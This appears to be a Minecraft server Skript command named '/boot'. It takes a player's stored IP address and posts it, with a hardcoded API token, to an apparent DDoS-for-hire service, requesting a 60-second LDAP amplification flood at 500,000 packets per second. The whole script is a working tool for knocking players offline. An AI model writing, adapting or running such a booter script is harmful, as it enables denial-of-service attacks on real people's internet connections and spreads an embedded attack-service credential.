
command /boot <text>:
	permission: is.Pluto
	trigger:
		if {ip::%arg-1%} is not set:
			message "No ip set"
			stop
			
		send a "post" request to "https://api.wifi.rip/v1/attacks/launch" with the body "" and the headers "token=""85daf750c56db9291ebd44a17b5b8cc3""", and "target=""%{ip::%arg-1%}%""", and "port=80", and "duration=60", and "method=""LDAP""", and "pps=500000"
 
		set {_resp} to the last http response
		message "%{_resp}%"